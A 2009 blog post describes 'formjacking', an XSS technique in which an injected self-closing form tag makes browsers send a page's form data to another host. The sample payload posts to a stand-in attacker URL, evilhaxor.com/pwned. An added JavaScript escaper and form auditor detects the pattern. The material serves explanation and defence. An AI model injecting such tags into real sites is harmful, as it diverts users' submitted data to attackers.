
Formjacking

Just read a cool post over at omg.wtf.bbq about a new attack called “formjacking”. Not sure about the attack name, but this is pretty neat. In Firefox 3 and IE7, self-contained XHTML tags provide a way to exploit an XSS vulnerability and alter the action associated with a form tag. I’ve tested this out and it also works with Google Chrome, so the same goes for the other WebKit-based browsers like Safari.

The gist is that if you can insert a self-contained form tag, the browser will ignore the other form tags. Let’s say that you have the following code:

<form action="good.php" method="post">
<input type="text" name="test" id="test"></input>
<input type="Submit" value="Submit">
</form>

If you can insert a self-enclosed form tag:

<form action="http://evilhaxor.com/pwned" method="post" />
<form action="good.php" method="post">
<input type="text" name="test" id="test"></input>
<input type="Submit" value="Submit">
</form>

Notice the forward slash at the end of the tag? The second form tag will be ignored and the post data will be sent to the inserted action.
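To check for this on the defending side, here is an added example (not from the original post or the post it links to) that encodes the reflected value and audits markup for the pattern shown above. The page URL `https://shop.example/checkout`, the function names and the sample strings are assumptions made for the example.

```javascript
// Added example: constructed page URL and markup; not code from the original post.
const PAGE_URL = 'https://shop.example/checkout';
const CLEAN = '<form action="good.php" method="post">\n' +
  '<input type="text" name="test" id="test"></input>\n' +
  '<input type="Submit" value="Submit">\n</form>';
const INJECTED = '<form action="http://evilhaxor.com/pwned" method="post" />\n' + CLEAN;

// Mitigation: encode user-controlled text before writing it into HTML, so an
// injected "<form ... />" is rendered as text instead of being parsed as a tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Detection: one finding per <form> start tag that is self-closed, opens while
// an earlier form is still open, or posts to an origin other than the page's.
function auditForms(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  const tagRe = /<(\/?)form\b([^>]*)>/gi; // simple scanner: assumes no ">" inside attribute values
  let open = 0, m;
  while ((m = tagRe.exec(html)) !== null) {
    if (m[1]) { open = Math.max(0, open - 1); continue; } // closing </form>
    const attrs = m[2], reasons = [];
    if (/\/\s*$/.test(attrs)) reasons.push('self-closed');
    if (open > 0) reasons.push('nested');
    const a = /\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i.exec(attrs);
    const action = a ? (a[1] ?? a[2] ?? a[3]) : '';
    try {
      // A relative or empty action resolves against the page URL (same origin).
      if (new URL(action, pageUrl).origin !== pageOrigin) reasons.push('cross-origin action');
    } catch { reasons.push('unparseable action'); }
    if (reasons.length) findings.push({ action, reasons });
    // As the post describes, the self-closed tag still acts as the active form,
    // so it counts as open and the legitimate form after it is reported as nested.
    open += 1;
  }
  return findings;
}

console.log(auditForms(INJECTED, PAGE_URL));
```

Run over rendered responses in a test suite or proxy, the same check also catches an injected form that is not self-closed, since its action still resolves to a foreign origin.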


  1. May 17th, 2009 at 16:45 | #1

    cool, except your evil form tag is not really self-enclosed in your code snippet

  2. Eric
    May 20th, 2009 at 11:08 | #2

    Yeah, thanks for pointing that out…fixed.
